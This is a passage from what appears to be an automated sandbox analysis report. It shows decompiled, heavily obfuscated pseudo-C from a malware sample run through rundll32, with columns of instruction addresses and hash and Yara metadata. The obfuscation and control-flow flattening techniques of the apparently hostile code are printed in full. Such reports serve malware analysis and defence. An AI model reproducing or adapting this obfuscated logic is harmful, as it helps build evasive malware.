				_v2668 = _v2668 ^ 0x1c042184;
				_v2700 = 0xcd0c2b;
				_v2700 = _v2700 >> 8;
				_v2700 = _v2700 + 0xfffff064;
				_v2700 = _v2700 ^ 0x0007642a;
				_v2708 = 0x1a6cb4;
				_v2708 = _v2708 ^ 0x57f593cf;
				_v2708 = _v2708 | 0x44881231;
				_v2708 = _v2708 ^ 0x57eba098;
				_v2752 = 0xd7110a;
				_v2752 = _v2752 / _t556;
				_v2752 = _v2752 << 0xe;
				_v2752 = _v2752 + 0xffff1365;
				_v2752 = _v2752 ^ 0x83185000;
				_v2760 = 0xc45920;
				_v2760 = _v2760 + 0xffffdf34;
				_v2760 = _v2760 >> 0x10;
				_v2760 = _v2760 + 0xfa48;
				_v2760 = _v2760 ^ 0x00031526;
				_v2652 = 0x3af3c9;
				_v2652 = _v2652 << 0xf;
				_v2652 = _v2652 ^ 0x79efd05d;
				_v2660 = 0x38b4f1;
				_v2660 = _v2660 ^ 0x7076ccd1;
				_v2660 = _v2660 ^ 0x704b934c;
				_v2744 = 0x6269bc;
				_v2744 = _v2744 | 0xfa5eccfb;
				_v2744 = _v2744 * 0x5f;
				_v2744 = _v2744 << 0xe;
				_v2744 = _v2744 ^ 0x9469f4ee;
				_v2676 = 0x941055;
				_v2676 = _v2676 | 0xfd7f72ef;
				_v2676 = _v2676 ^ 0xfdfef17e;
				_v2684 = 0x7199f;
				_v2684 = _v2684 + 0x9aa9;
				_v2684 = _v2684 << 0xe;
				_v2684 = _v2684 ^ 0xed16f6de;
				_v2644 = 0xf4560;
				_v2644 = _v2644 * 0x1c;
				_v2644 = _v2644 ^ 0x01a06f93;
				_v2692 = 0x891e84;
				_v2692 = _v2692 ^ 0x46454346;
				_v2692 = _v2692 | 0x068a2534;
				_v2692 = _v2692 ^ 0x46ca9877;
				_v2736 = 0x29dfc8;
				_t471 = _v2736 * 0x19;
				_v2736 = _t471;
				_v2736 = _v2736 | 0x3d4578d3;
				_v2736 = _v2736 >> 4;
				_v2736 = _v2736 ^ 0x03d45238;
				while(_t553 != 0x2953b22) {
					if(_t553 == 0x422d362) {
						_t553 = 0xe704baa;
						continue;
					} else {
						_t565 = _t553 - 0xe704baa;
						if(_t553 != 0xe704baa) {
							L8:
							__eflags = _t553 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E001912A8(_t500, _v2748, _t565, _v2788, _v2716,  &_v2600);
							 *((short*)(E00184FA8(_v2720,  &_v2600, _v2688, _v2624))) = 0;
							E00178650(_v2780,  &_v1560, _t565, _v2696);
							_push(_v2712);
							_push(_v2664);
							_push(0x17181c);
							E0017E7CE(E0017AB66(_v2756, _v2672, _t565), _t565, _v2704,  &_v2600, _v2756, _v2740, _v2772, _v2680, _v2656,  &_v1560);
							E0017AE03(_v2628, _v2648, _v2636, _t483);
							_t500 = _v2792;
							_t471 = E0018C38F(_t500,  &_v2080, _t552, _v2764);
							_t558 =  &(_t558[0x15]);
							if(_t471 != 0) {
								_t553 = 0x2953b22;
								continue;
							}
						}
					}
					return _t471;
				}
				_push(_t500);
				E0017EA7B( &_v1040, _v2784, _v2640, _t500, _v2732, _v2724, _v2728);
				_push(_v2776);
				_push(_v2620);
				_push(0x17185c);
				E0017E7CE(E0017AB66(_v2632, _v2768, __eflags), __eflags, _v2668,  &_v1040, _v2632, _v2700, _v2708, _v2752, _v2760,  &_v2080);
				_t503 = _v2652;
				E0017AE03(_t503, _v2660, _v2744, _t473);
				__eflags = 0;
				_push(_v2736);
				_push(_v2692);
				_push(_v2644);
				_push(0);
				_push(0);
				_push(_v2684);
				_push(_t503);
				_push(0);
				_t500 =  &_v520;
				_t471 = E00179700(_t500, _v2676, 0);
				_t558 =  &(_t558[0x1c]);
				_t553 = 0x740d40c;
				goto L8;
			}









































































                                                                                                                      0x0018a429
                                                                                                                      0x0018a42f
                                                                                                                      0x0018a439
                                                                                                                      0x0018a444
                                                                                                                      0x0018a44f
                                                                                                                      0x0018a45a
                                                                                                                      0x0018a465
                                                                                                                      0x0018a46c
                                                                                                                      0x0018a477
                                                                                                                      0x0018a47f
                                                                                                                      0x0018a487
                                                                                                                      0x0018a48f
                                                                                                                      0x0018a497
                                                                                                                      0x0018a49f
                                                                                                                      0x0018a4a7
                                                                                                                      0x0018a4af
                                                                                                                      0x0018a4b4
                                                                                                                      0x0018a4bc
                                                                                                                      0x0018a4c4
                                                                                                                      0x0018a4d5
                                                                                                                      0x0018a4d9
                                                                                                                      0x0018a4db
                                                                                                                      0x0018a4e0
                                                                                                                      0x0018a4e5
                                                                                                                      0x0018a4ed
                                                                                                                      0x0018a4f5
                                                                                                                      0x0018a4fd
                                                                                                                      0x0018a505
                                                                                                                      0x0018a50d
                                                                                                                      0x0018a515
                                                                                                                      0x0018a523
                                                                                                                      0x0018a528
                                                                                                                      0x0018a52e
                                                                                                                      0x0018a536
                                                                                                                      0x0018a541
                                                                                                                      0x0018a54c
                                                                                                                      0x0018a557
                                                                                                                      0x0018a55f
                                                                                                                      0x0018a567
                                                                                                                      0x0018a56f
                                                                                                                      0x0018a574
                                                                                                                      0x0018a57c
                                                                                                                      0x0018a584
                                                                                                                      0x0018a591
                                                                                                                      0x0018a592
                                                                                                                      0x0018a596
                                                                                                                      0x0018a59e
                                                                                                                      0x0018a5a6
                                                                                                                      0x0018a5ab
                                                                                                                      0x0018a5b3
                                                                                                                      0x0018a5b7
                                                                                                                      0x0018a5bf
                                                                                                                      0x0018a5d2
                                                                                                                      0x0018a5d9
                                                                                                                      0x0018a5e4
                                                                                                                      0x0018a5ef
                                                                                                                      0x0018a5f6
                                                                                                                      0x0018a601
                                                                                                                      0x0018a60f
                                                                                                                      0x0018a613
                                                                                                                      0x0018a61b
                                                                                                                      0x0018a623
                                                                                                                      0x0018a630
                                                                                                                      0x0018a634
                                                                                                                      0x0018a63c
                                                                                                                      0x0018a644
                                                                                                                      0x0018a654
                                                                                                                      0x0018a659
                                                                                                                      0x0018a65d
                                                                                                                      0x0018a66d
                                                                                                                      0x0018a671
                                                                                                                      0x0018a679
                                                                                                                      0x0018a687
                                                                                                                      0x0018a68c
                                                                                                                      0x0018a690
                                                                                                                      0x0018a69f
                                                                                                                      0x0018a6a2
                                                                                                                      0x0018a6a6
                                                                                                                      0x0018a6ae
                                                                                                                      0x0018a6c4
                                                                                                                      0x0018a6cb
                                                                                                                      0x0018a6d6
                                                                                                                      0x0018a6e1
                                                                                                                      0x0018a6f3
                                                                                                                      0x0018a6f8
                                                                                                                      0x0018a6ff
                                                                                                                      0x0018a70a
                                                                                                                      0x0018a71e
                                                                                                                      0x0018a723
                                                                                                                      0x0018a72a
                                                                                                                      0x0018a735
                                                                                                                      0x0018a74a
                                                                                                                      0x0018a74b
                                                                                                                      0x0018a752
                                                                                                                      0x0018a75d
                                                                                                                      0x0018a768
                                                                                                                      0x0018a773
                                                                                                                      0x0018a77e
                                                                                                                      0x0018a786
                                                                                                                      0x0018a78e
                                                                                                                      0x0018a793
                                                                                                                      0x0018a79b
                                                                                                                      0x0018a7a3
                                                                                                                      0x0018a7ab
                                                                                                                      0x0018a7bb
                                                                                                                      0x0018a7bf
                                                                                                                      0x0018a7c7
                                                                                                                      0x0018a7cf
                                                                                                                      0x0018a7d7
                                                                                                                      0x0018a7df
                                                                                                                      0x0018a7e7
                                                                                                                      0x0018a7ef
                                                                                                                      0x0018a7f7
                                                                                                                      0x0018a805
                                                                                                                      0x0018a809
                                                                                                                      0x0018a811
                                                                                                                      0x0018a81b
                                                                                                                      0x0018a823
                                                                                                                      0x0018a828
                                                                                                                      0x0018a82d
                                                                                                                      0x0018a835
                                                                                                                      0x0018a83d
                                                                                                                      0x0018a845
                                                                                                                      0x0018a84d
                                                                                                                      0x0018a855
                                                                                                                      0x0018a869
                                                                                                                      0x0018a86e
                                                                                                                      0x0018a875
                                                                                                                      0x0018a880
                                                                                                                      0x0018a88f
                                                                                                                      0x0018a892
                                                                                                                      0x0018a896
                                                                                                                      0x0018a89e
                                                                                                                      0x0018a8a6
                                                                                                                      0x0018a8ae
                                                                                                                      0x0018a8c4
                                                                                                                      0x0018a8cb
                                                                                                                      0x0018a8d6
                                                                                                                      0x0018a8e3
                                                                                                                      0x0018a8e6
                                                                                                                      0x0018a8f2
                                                                                                                      0x0018a8fa
                                                                                                                      0x0018a8ff
                                                                                                                      0x0018a903
                                                                                                                      0x0018a90b
                                                                                                                      0x0018a91e
                                                                                                                      0x0018a925
                                                                                                                      0x0018a930
                                                                                                                      0x0018a938
                                                                                                                      0x0018a93d
                                                                                                                      0x0018a945
                                                                                                                      0x0018a94d
                                                                                                                      0x0018a955
                                                                                                                      0x0018a95d
                                                                                                                      0x0018a965
                                                                                                                      0x0018a96d
                                                                                                                      0x0018a97b
                                                                                                                      0x0018a97f
                                                                                                                      0x0018a984
                                                                                                                      0x0018a98c
                                                                                                                      0x0018a994
                                                                                                                      0x0018a99c
                                                                                                                      0x0018a9a4
                                                                                                                      0x0018a9a9
                                                                                                                      0x0018a9b1
                                                                                                                      0x0018a9b9
                                                                                                                      0x0018a9c4
                                                                                                                      0x0018a9cc
                                                                                                                      0x0018a9d7
                                                                                                                      0x0018a9e2
                                                                                                                      0x0018a9ed
                                                                                                                      0x0018a9f8
                                                                                                                      0x0018aa00
                                                                                                                      0x0018aa0d
                                                                                                                      0x0018aa16
                                                                                                                      0x0018aa20
                                                                                                                      0x0018aa28
                                                                                                                      0x0018aa33
                                                                                                                      0x0018aa3e
                                                                                                                      0x0018aa49
                                                                                                                      0x0018aa51
                                                                                                                      0x0018aa59
                                                                                                                      0x0018aa5e
                                                                                                                      0x0018aa66
                                                                                                                      0x0018aa79
                                                                                                                      0x0018aa80
                                                                                                                      0x0018aa8b
                                                                                                                      0x0018aa93
                                                                                                                      0x0018aa9b
                                                                                                                      0x0018aaa3
                                                                                                                      0x0018aaab
                                                                                                                      0x0018aab3
                                                                                                                      0x0018aab8
                                                                                                                      0x0018aabc
                                                                                                                      0x0018aac4
                                                                                                                      0x0018aac9
                                                                                                                      0x0018aad1
                                                                                                                      0x0018aadf
                                                                                                                      0x0018abe3
                                                                                                                      0x00000000
                                                                                                                      0x0018aae5
                                                                                                                      0x0018aae5
                                                                                                                      0x0018aae7
                                                                                                                      0x0018acbc
                                                                                                                      0x0018acbc
                                                                                                                      0x0018acc2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018aaed
                                                                                                                      0x0018ab01
                                                                                                                      0x0018ab34
                                                                                                                      0x0018ab3b
                                                                                                                      0x0018ab40
                                                                                                                      0x0018ab44
                                                                                                                      0x0018ab56
                                                                                                                      0x0018ab9c
                                                                                                                      0x0018abb7
                                                                                                                      0x0018abc0
                                                                                                                      0x0018abcc
                                                                                                                      0x0018abd1
                                                                                                                      0x0018abd6
                                                                                                                      0x0018abdc
                                                                                                                      0x00000000
                                                                                                                      0x0018abdc
                                                                                                                      0x0018abd6
                                                                                                                      0x0018aae7
                                                                                                                      0x0018acd2
                                                                                                                      0x0018acd2
                                                                                                                      0x0018abea
                                                                                                                      0x0018ac0a
                                                                                                                      0x0018ac0f
                                                                                                                      0x0018ac13
                                                                                                                      0x0018ac25
                                                                                                                      0x0018ac65
                                                                                                                      0x0018ac76
                                                                                                                      0x0018ac7d
                                                                                                                      0x0018ac85
                                                                                                                      0x0018ac87
                                                                                                                      0x0018ac8b
                                                                                                                      0x0018ac8f
                                                                                                                      0x0018ac96
                                                                                                                      0x0018ac97
                                                                                                                      0x0018ac98
                                                                                                                      0x0018aca6
                                                                                                                      0x0018aca7
                                                                                                                      0x0018aca8
                                                                                                                      0x0018acaf
                                                                                                                      0x0018acb4
                                                                                                                      0x0018acb7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7h$;:$E%$FCEF$Xth$8$x
                                                                                                                      • API String ID: 0-4119786196
                                                                                                                      • Opcode ID: 709b9e8d03774faf9589d6e20b4cf2b00498f3f9867e8e1bb23e0996c8fb547c
                                                                                                                      • Instruction ID: 32afc34afb4dbb7510f61afb5d46c9ba37945ac3994e191585384c19a630b1de
                                                                                                                      • Opcode Fuzzy Hash: 709b9e8d03774faf9589d6e20b4cf2b00498f3f9867e8e1bb23e0996c8fb547c
                                                                                                                      • Instruction Fuzzy Hash: 002200B1508381DFD368CF25C94AA4BFBE2BBC4708F508A1DE2D986261D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00190D5B Relevance: 9.0, Strings: 7, Instructions: 286COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00190D5B() {
				void* _t279;
				signed char _t284;
				intOrPtr _t294;
				signed int _t296;
				signed int _t302;
				signed char _t309;
				intOrPtr _t310;
				void* _t311;
				signed short _t340;
				signed int _t341;
				intOrPtr _t342;
				signed int _t346;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed short* _t359;
				void* _t361;

				 *(_t361 + 0x80) =  *(_t361 + 0x80) & 0x00000000;
				 *(_t361 + 0x74) = 0x716487;
				_t302 = 0x4e9f10f;
				 *(_t361 + 0x78) = 0xba6397;
				 *(_t361 + 0x7c) = 0x705fb8;
				 *(_t361 + 0x68) = 0x4c092e;
				_t7 = _t361 + 0x68; // 0x4c092e
				_t349 = 5;
				 *(_t361 + 0x7c) =  *_t7 / _t349;
				 *(_t361 + 0x7c) =  *(_t361 + 0x7c) ^ 0x0003a2ba;
				 *(_t361 + 0x64) = 0x751de4;
				 *(_t361 + 0x64) =  *(_t361 + 0x64) + 0xffff6a51;
				 *(_t361 + 0x64) =  *(_t361 + 0x64) ^ 0x007ee7f9;
				 *(_t361 + 0x44) = 0x9fd9a3;
				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 6;
				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 4;
				 *(_t361 + 0x44) =  *(_t361 + 0x44) ^ 0x7f6c4ffb;
				 *(_t361 + 0x28) = 0x22a0e;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) >> 0xb;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) + 0x788;
				_t350 = 0x41;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) * 0x62;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) ^ 0x000a9bb9;
				 *(_t361 + 0x20) = 0xda6f7f;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 0x62;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 7;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) << 0xa;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) ^ 0x5b1b1cce;
				 *(_t361 + 0x74) = 0x2b9064;
				 *(_t361 + 0x74) =  *(_t361 + 0x74) + 0x7c5a;
				 *(_t361 + 0x74) =  *(_t361 + 0x74) ^ 0x002a32d7;
				 *(_t361 + 0x5c) = 0xcbc6c3;
				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) * 0x12;
				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) ^ 0x0e5c6d3d;
				 *(_t361 + 0x40) = 0xfaf28f;
				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x36c89793;
				 *(_t361 + 0x40) =  *(_t361 + 0x40) | 0x5dfe35bf;
				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x7ff1266d;
				 *(_t361 + 0x3c) = 0x71501;
				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7d526c09;
				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) | 0x29ca113d;
				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7dd950c2;
				 *(_t361 + 0x78) = 0x2c4b29;
				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa68b4193;
				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa6a148a4;
				 *(_t361 + 0x50) = 0xa9eb43;
				 *(_t361 + 0x50) =  *(_t361 + 0x50) << 4;
				 *(_t361 + 0x50) =  *(_t361 + 0x50) ^ 0x0a966e12;
				 *(_t361 + 0x24) = 0xf29fdf;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) / _t350;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) | 0x702811c1;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0xfde5eea1;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0x8dc07913;
				 *(_t361 + 0x48) = 0x26e009;
				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xd6899262;
				 *(_t361 + 0x48) =  *(_t361 + 0x48) << 1;
				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xad52b6d6;
				 *(_t361 + 0x1c) = 0xb261a6;
				 *(_t361 + 0x1c) =  *(_t361 + 0x1c) + 0x753a;
				_t351 = 0x3f;
				 *(_t361 + 0x18) =  *(_t361 + 0x1c) / _t351;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xffffc68f;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x00055965;
				 *(_t361 + 0x10) = 0xb29e6;
				 *(_t361 + 0x10) =  *(_t361 + 0x10) ^ 0xf1ef7176;
				_t352 = 0x53;
				_t346 =  *(_t361 + 0x80);
				 *(_t361 + 0x14) =  *(_t361 + 0x10) * 0x52;
				 *(_t361 + 0x14) =  *(_t361 + 0x14) + 0xffff3d5f;
				 *(_t361 + 0x14) =  *(_t361 + 0x14) ^ 0x7b287ee9;
				 *(_t361 + 0x6c) = 0xc2349f;
				_t359 =  *(_t361 + 0x80);
				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) * 0x2b;
				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) ^ 0x209b01de;
				 *(_t361 + 0x30) = 0xecc1f5;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x10955a53;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) | 0x79713791;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) / _t352;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x017289e0;
				 *(_t361 + 0x58) = 0x8daaf;
				_t353 = 0xe;
				 *(_t361 + 0x58) =  *(_t361 + 0x58) / _t353;
				 *(_t361 + 0x58) =  *(_t361 + 0x58) ^ 0x00025281;
				 *(_t361 + 0x54) = 0x82784e;
				 *(_t361 + 0x54) =  *(_t361 + 0x54) | 0x1fcf3d57;
				 *(_t361 + 0x54) =  *(_t361 + 0x54) ^ 0x1fc5386b;
				 *(_t361 + 0x2c) = 0xdcbbf5;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 0xa;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 2;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) + 0xffff64c3;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) ^ 0xfffe0972;
				 *(_t361 + 0x70) = 0xf032c2;
				 *(_t361 + 0x70) =  *(_t361 + 0x70) + 0xffff1f36;
				 *(_t361 + 0x70) =  *(_t361 + 0x70) ^ 0x00e5c56e;
				 *(_t361 + 0x38) = 0xb1df5b;
				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xe;
				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xa;
				 *(_t361 + 0x38) =  *(_t361 + 0x38) ^ 0x5b06c733;
				 *(_t361 + 0x18) = 0x22b4d7;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x9a622f3f;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xcb3c;
				_t354 = 0x1f;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) / _t354;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x04f5d5b3;
				 *(_t361 + 0x34) = 0xa6176b;
				_t355 = 0x3b;
				 *(_t361 + 0x30) =  *(_t361 + 0x34) / _t355;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) >> 0xb;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) + 0xffffd9a6;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0xfffb162a;
				while(1) {
					L1:
					L2:
					while(1) {
						while(_t302 != 0xb6d0a5) {
							if(_t302 == 0x1c75f00) {
								_push(_t302);
								_push(_t302);
								_t311 = 0x68;
								_t359 = E00183512(_t311);
								__eflags = _t359;
								if(__eflags != 0) {
									_t302 = 0xb6d0a5;
									goto L17;
								}
							} else {
								if(_t302 == 0x4e9f10f) {
									_t342 =  *0x195214; // 0x0
									_t302 = 0x8016e2b;
									_t341 = _t342 + 4;
									goto L12;
								} else {
									if(_t302 == 0x6570a92) {
										_t294 =  *0x195214; // 0x0
										_t302 = 0xe9e8905;
										 *_t341 = _t359;
										_t212 =  &(_t359[0x2c]); // 0x58
										_t341 = _t212;
										_t213 = _t294 + 0x44;
										 *_t213 =  *(_t294 + 0x44) + 1;
										__eflags =  *_t213;
										L12:
										 *(_t361 + 0x5c) = _t341;
										goto L13;
									} else {
										if(_t302 == 0x8016e2b) {
											_t296 = E0018EAE6(0x195000,  *((intOrPtr*)(_t361 + 0x88)), __eflags,  *(_t361 + 0x6c),  *(_t361 + 0x48), _t361 + 0x84,  *(_t361 + 0x24));
											_t361 = _t361 + 0x10;
											 *(_t361 + 0x7c) = _t296;
											_t346 = _t296;
											_t302 = 0x1c75f00;
											 *(_t361 + 0x64) = _t296 +  *(_t361 + 0x80);
											goto L1;
										} else {
											if(_t302 == 0x8020f8f) {
												E001768DE( *(_t361 + 0x78),  *(_t361 + 0x40),  *(_t361 + 0x1c),  *(_t361 + 0x34),  *(_t361 + 0x7c));
											} else {
												if(_t302 != 0xe9e8905) {
													L19:
													__eflags = _t302 - 0x718ec4e;
													if(__eflags != 0) {
														L17:
														_t341 =  *(_t361 + 0x5c);
														L13:
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t302 = (_t302 & 0xf9c54f71) + 0x8020f8f;
													continue;
												}
											}
										}
									}
								}
							}
							_t310 =  *0x195214; // 0x0
							 *(_t310 + 0x38) =  *(_t310 + 0x38) & 0x00000000;
							 *((intOrPtr*)(_t310 + 0x3c)) =  *((intOrPtr*)(_t310 + 4));
							__eflags = 1;
							return 1;
						}
						_push( *((intOrPtr*)(_t361 + 0x4c)));
						_push( *(_t361 + 0x78));
						 *((char*)(_t361 + 0x53)) =  *((intOrPtr*)(_t346 + 1));
						_push(0x17134c);
						 *(_t361 + 0x56) =  *((intOrPtr*)(_t346 + 2));
						_t279 = E0017AB66( *(_t361 + 0x44),  *(_t361 + 0x40), __eflags);
						_t231 =  &(_t359[0x10]); // 0x20
						_push(_t279);
						E0018BDB5(_t231, __eflags, 0x10,  *(_t361 + 0x54),  *(_t361 + 0x74),  *(_t361 + 0x44),  *(_t361 + 0x38),  *(_t361 + 0x56) & 0x000000ff,  *((intOrPtr*)(_t361 + 0x88)),  *(_t361 + 0x48),  *(_t361 + 0x63) & 0x000000ff,  *(_t346 + 3) & 0x000000ff,  *(_t346 + 3) & 0x000000ff);
						E0017AE03( *((intOrPtr*)(_t361 + 0x94)),  *((intOrPtr*)(_t361 + 0x90)),  *(_t361 + 0x64), _t279);
						_t361 = _t361 + 0x40;
						 *_t359 = ( *(_t346 + 4) & 0x000000ff) << 0x00000008 |  *(_t346 + 5) & 0x000000ff;
						_t284 =  *((intOrPtr*)(_t346 + 6));
						_t309 =  *((intOrPtr*)(_t346 + 7));
						_t346 = _t346 + 8;
						_t302 = 0x6570a92;
						_t340 = (_t284 & 0x000000ff) << 0x00000008 | _t309 & 0x000000ff;
						__eflags = _t340;
						_t359[0x28] = _t340;
						goto L19;
					}
				}
			}
























                                                                                                                      0x00190d61
                                                                                                                      0x00190d6b
                                                                                                                      0x00190d73
                                                                                                                      0x00190d78
                                                                                                                      0x00190d80
                                                                                                                      0x00190d88
                                                                                                                      0x00190d90
                                                                                                                      0x00190d9a
                                                                                                                      0x00190d9f
                                                                                                                      0x00190da5
                                                                                                                      0x00190dad
                                                                                                                      0x00190db5
                                                                                                                      0x00190dbd
                                                                                                                      0x00190dc5
                                                                                                                      0x00190dcd
                                                                                                                      0x00190dd2
                                                                                                                      0x00190dd7
                                                                                                                      0x00190ddf
                                                                                                                      0x00190de7
                                                                                                                      0x00190dec
                                                                                                                      0x00190df9
                                                                                                                      0x00190dfc
                                                                                                                      0x00190e00
                                                                                                                      0x00190e08
                                                                                                                      0x00190e15
                                                                                                                      0x00190e1e
                                                                                                                      0x00190e22
                                                                                                                      0x00190e27
                                                                                                                      0x00190e2f
                                                                                                                      0x00190e37
                                                                                                                      0x00190e3f
                                                                                                                      0x00190e47
                                                                                                                      0x00190e54
                                                                                                                      0x00190e58
                                                                                                                      0x00190e60
                                                                                                                      0x00190e68
                                                                                                                      0x00190e70
                                                                                                                      0x00190e78
                                                                                                                      0x00190e80
                                                                                                                      0x00190e88
                                                                                                                      0x00190e90
                                                                                                                      0x00190e98
                                                                                                                      0x00190ea0
                                                                                                                      0x00190ea8
                                                                                                                      0x00190eb0
                                                                                                                      0x00190eb8
                                                                                                                      0x00190ec0
                                                                                                                      0x00190ec5
                                                                                                                      0x00190ecd
                                                                                                                      0x00190edd
                                                                                                                      0x00190ee1
                                                                                                                      0x00190ee9
                                                                                                                      0x00190ef1
                                                                                                                      0x00190ef9
                                                                                                                      0x00190f01
                                                                                                                      0x00190f09
                                                                                                                      0x00190f0d
                                                                                                                      0x00190f15
                                                                                                                      0x00190f1d
                                                                                                                      0x00190f29
                                                                                                                      0x00190f2c
                                                                                                                      0x00190f30
                                                                                                                      0x00190f38
                                                                                                                      0x00190f42
                                                                                                                      0x00190f4a
                                                                                                                      0x00190f59
                                                                                                                      0x00190f5c
                                                                                                                      0x00190f63
                                                                                                                      0x00190f67
                                                                                                                      0x00190f6f
                                                                                                                      0x00190f77
                                                                                                                      0x00190f84
                                                                                                                      0x00190f8b
                                                                                                                      0x00190f8f
                                                                                                                      0x00190f97
                                                                                                                      0x00190f9f
                                                                                                                      0x00190fa7
                                                                                                                      0x00190fb7
                                                                                                                      0x00190fbb
                                                                                                                      0x00190fc3
                                                                                                                      0x00190fcf
                                                                                                                      0x00190fd4
                                                                                                                      0x00190fda
                                                                                                                      0x00190fe2
                                                                                                                      0x00190fea
                                                                                                                      0x00190ff2
                                                                                                                      0x00190ffa
                                                                                                                      0x00191002
                                                                                                                      0x00191007
                                                                                                                      0x0019100c
                                                                                                                      0x00191014
                                                                                                                      0x0019101c
                                                                                                                      0x00191024
                                                                                                                      0x0019102c
                                                                                                                      0x00191034
                                                                                                                      0x0019103c
                                                                                                                      0x00191041
                                                                                                                      0x00191046
                                                                                                                      0x0019104e
                                                                                                                      0x00191056
                                                                                                                      0x0019105e
                                                                                                                      0x0019106a
                                                                                                                      0x0019106f
                                                                                                                      0x00191075
                                                                                                                      0x0019107d
                                                                                                                      0x00191089
                                                                                                                      0x0019108c
                                                                                                                      0x00191090
                                                                                                                      0x00191095
                                                                                                                      0x0019109d
                                                                                                                      0x001910a9
                                                                                                                      0x001910a9
                                                                                                                      0x00000000
                                                                                                                      0x001910ad
                                                                                                                      0x001910ad
                                                                                                                      0x001910bf
                                                                                                                      0x00191189
                                                                                                                      0x0019118a
                                                                                                                      0x0019118d
                                                                                                                      0x00191193
                                                                                                                      0x00191197
                                                                                                                      0x00191199
                                                                                                                      0x0019119f
                                                                                                                      0x00000000
                                                                                                                      0x0019119f
                                                                                                                      0x001910c5
                                                                                                                      0x001910cb
                                                                                                                      0x0019116d
                                                                                                                      0x00191173
                                                                                                                      0x00191178
                                                                                                                      0x00000000
                                                                                                                      0x001910d1
                                                                                                                      0x001910d7
                                                                                                                      0x0019114e
                                                                                                                      0x00191153
                                                                                                                      0x00191158
                                                                                                                      0x0019115a
                                                                                                                      0x0019115a
                                                                                                                      0x0019115d
                                                                                                                      0x0019115d
                                                                                                                      0x0019115d
                                                                                                                      0x00191160
                                                                                                                      0x00191160
                                                                                                                      0x00000000
                                                                                                                      0x001910d9
                                                                                                                      0x001910df
                                                                                                                      0x0019112b
                                                                                                                      0x00191130
                                                                                                                      0x00191133
                                                                                                                      0x00191137
                                                                                                                      0x00191139
                                                                                                                      0x00191145
                                                                                                                      0x00000000
                                                                                                                      0x001910e1
                                                                                                                      0x001910e7
                                                                                                                      0x00191282
                                                                                                                      0x001910ed
                                                                                                                      0x001910f3
                                                                                                                      0x00191261
                                                                                                                      0x00191261
                                                                                                                      0x00191267
                                                                                                                      0x001911a4
                                                                                                                      0x001911a4
                                                                                                                      0x00191164
                                                                                                                      0x00000000
                                                                                                                      0x00191164
                                                                                                                      0x001910f9
                                                                                                                      0x001910fb
                                                                                                                      0x00191103
                                                                                                                      0x00000000
                                                                                                                      0x00191103
                                                                                                                      0x001910f3
                                                                                                                      0x001910e7
                                                                                                                      0x001910df
                                                                                                                      0x001910d7
                                                                                                                      0x001910cb
                                                                                                                      0x0019128a
                                                                                                                      0x00191296
                                                                                                                      0x0019129a
                                                                                                                      0x0019129f
